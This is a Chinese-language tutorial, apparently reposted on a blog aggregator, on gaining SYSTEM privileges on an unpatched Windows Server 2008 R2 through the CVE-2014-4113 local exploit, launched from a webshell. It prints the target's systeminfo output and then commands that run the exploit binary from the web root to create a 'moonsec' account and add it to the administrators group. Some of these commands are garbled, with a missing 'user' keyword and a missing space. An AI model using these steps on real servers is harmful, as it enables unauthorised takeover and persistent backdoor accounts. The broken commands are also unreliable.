服务器2008系统提权工具,提权教程:winserver2008R2溢出提权
摘要
1、簡(jiǎn)介
在winserver2008 r2 中 服務(wù)器默認(rèn)是支持aspx的。所以默認(rèn)都是可以執(zhí)行一些命令。
如果沒(méi)有進(jìn)行補(bǔ)丁修復(fù)可以利用一些溢出提權(quán)工具,進(jìn)行提權(quán)。
2、CVE-2014-4113-Exploit
這個(gè)版本的提權(quán)工具 可以對(duì)winserver2008 的系統(tǒng)進(jìn)行溢出提權(quán)
3、實(shí)戰(zhàn)
systeminfo 這個(gè)命令查看系統(tǒng)信息的
主機(jī)名:??????????WIN-HRKJ54V1GSJ
OS?名稱:?????????Microsoft?Windows?Web?Server?2008?R2
OS?版本:?????????6.1.7601?Service?Pack?1?Build?7601
OS?制造商:????????MicrosoftCorporation
OS?配置:??????????獨(dú)立服務(wù)器
OS?構(gòu)件類型:?????Multiprocessor?Free
注冊(cè)的所有人:????Windows?用戶
注冊(cè)的組織:
產(chǎn)品?ID:?????????00500-001-0000635-84743
初始安裝日期:????2019/3/3,?16:24:34
系統(tǒng)啟動(dòng)時(shí)間:????2019/4/7,?17:14:40
系統(tǒng)制造商:??????VMware,?Inc.
系統(tǒng)型號(hào):????????VMware7,1
系統(tǒng)類型:????????x64-based?PC
處理器:??????????安裝了?2?個(gè)處理器。
[01]:?Intel64?Family?6?Model94?Stepping?3?GenuineIntel?~3408?Mhz
[02]:?Intel64?Family?6?Model94?Stepping?3?GenuineIntel?~3408?Mhz
BIOS?版本:????????VMware,?Inc.VMW71.00V.6997262.B64.1710270607,?2017/10/27
Windows?目錄:?????C:\Windows
系統(tǒng)目錄:????????C:\Windows\system32
啟動(dòng)設(shè)備:????????\Device\HarddiskVolume1
系統(tǒng)區(qū)域設(shè)置:????zh-cn;中文(中國(guó))
輸入法區(qū)域設(shè)置:??zh-cn;中文(中國(guó))
時(shí)區(qū):????????????(UTC+08:00)北京,重慶,香港特別行政區(qū),烏魯木齊
物理內(nèi)存總量:????4,095?MB
可用的物理內(nèi)存:??2,939?MB
虛擬內(nèi)存:?最大值:?8,188?MB
虛擬內(nèi)存:?可用:???6,603?MB
虛擬內(nèi)存:?使用中:?1,585?MB
頁(yè)面文件位置:????C:\pagefile.sys
域:???????????????WORKGROUP
登錄服務(wù)器:??????暫缺
修補(bǔ)程序:????????安裝了?2?個(gè)修補(bǔ)程序。
[01]:?KB2999226
[02]:?KB976902
網(wǎng)卡:????????????安裝了?1?個(gè)?NIC。
[01]:?Intel(R)?82574L?GigabitNetwork?Connection
連接名:??????本地連接
啟用?DHCP:???否
IP?地址
[01]:?192.168.0.105
[02]:fe80::986d:3564:19ad:2447
溢出成功
如果找不到可寫(xiě)目錄 可以 使用遍歷可寫(xiě)目錄的腳本進(jìn)行查找
增加用戶
/c?C:\inetpub\wwwroot\www.demo1.com\Win64.exe?"net?moonsec?moonsec?/add"
增加到用戶組
/c?C:\inetpub\wwwroot\www.demo1.com\Win64.exe?"net?localgroup?administratorsmoonsec?/add"
您可以選擇一種方式贊助本站支付寶轉(zhuǎn)賬贊助
分享到各大網(wǎng)站
總結(jié)
以上是生活随笔為你收集整理的服务器2008系统提权工具,提权教程:winserver2008R2溢出提权的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 正则 以小写英文字母开头,且只能包含英
- 下一篇: 知物由学 | 易盾SaaS系统资损防控体